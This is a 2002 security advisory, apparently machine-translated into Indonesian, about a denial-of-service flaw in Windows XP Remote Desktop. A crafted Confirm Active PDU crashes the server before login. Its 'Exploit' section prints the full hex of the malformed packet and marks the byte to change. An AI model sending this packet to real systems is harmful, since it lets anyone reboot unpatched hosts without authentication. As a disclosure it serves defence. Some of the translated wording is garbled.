Windows XP Remote Desktop Kerentanan pada DoS


Windows XP Remote Desktop Kerentanan pada DoS
Rentan:Microsoft Windows XP ProfessionalMicrosoft Windows. NET Standard Server Beta 3
Non-rentan:Microsoft Windows 2000 Server
Latar Belakang:Windows XP Professional memiliki remote penolakan serangan layanan ketika Remote Desktop diaktifkan. Remote Desktop adalah single XP Professional's-user RDP server (Terminal Services).
Diskusi:Pada awal protokol ada negosiasi kemampuan klien dan server grafis, di dalam paket yang disebut PDU Konfirmasi Aktif. Sebuah blok 32 byte dalam paket ini memungkinkan klien untuk menonaktifkan perintah gambar yang tidak mendukung.
Salah satu tampaknya kontrol apakah BLT Pola perintah dikirim. Pada Windows 2000 Server, menonaktifkan perintah ini akan membuat server mengirim bitmap bukan perintah Pola BLT. Namun, Windows XP Professional reboot ternyata ketika mencoba untuk membuat pola, karena hal ini terjadi sedangkan layar login sedang ditarik, ini tidak memerlukan klien untuk memiliki login atau disahkan ke server. Ini berlaku untuk semua versi dari protokol yang diuji (RDP 4.0, 5.0 dan 5.1), dan juga direproduksi dengan Windows Server Standard BERSIH. Beta 3.
Solusi:Nonaktifkan Remote Desktop (dari Control Panel, System, Remote, Remote Desktop, hapus opsi "Izinkan pengguna untuk melakukan koneksi remote ke komputer ini").
Exploit:Ditunjukkan di bawah adalah isi paket tidak terenkripsi untuk paket Konfirmasi bermasalah PDU Aktif. Satu-satunya perubahan adalah 01-00 pada baris yang ditunjukkan.
c4 01 13 00 F0 03 ea 03 01 00 ea 03 06 4d 00 ae 01 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00 03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00 00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05 00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00 2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- adalah "2a 00 01 01" 00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00 00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00 00 00 E4 04 00 00 13 00 28 00 01 00 00 03 78 00 00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00 0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00 0D 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00 0e 00 08 00 01 00 00 00 10 00 34 00 00 04 00 fe fe fe 00 04 00 00 08 00 00 08 00 fe fe fe 00 10 00 00 20 00 fe 00 40 00 fe fe 00 80 00 00 00 01 40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00 01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00 14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00 00 0a 00 01
Referensi:8.2.5 Bagian dari T.128 berbagi aplikasi multipoint, Seri T: Terminal untuk layanan telematika, ITU-T.
Microsoft diberitahu pada tanggal 16 April 2002.
Kredit:Ben Cohenben.cohen @ skygate.co.uk
Skygate Technology Ltdhttp://www.skygate.co.uk/+44 (0) 20 8542 7856

Download on Damnconcept

free download software, free download movies, free download mobile, and many more.
 

©Copyright 2011 download on damnconcept | TNB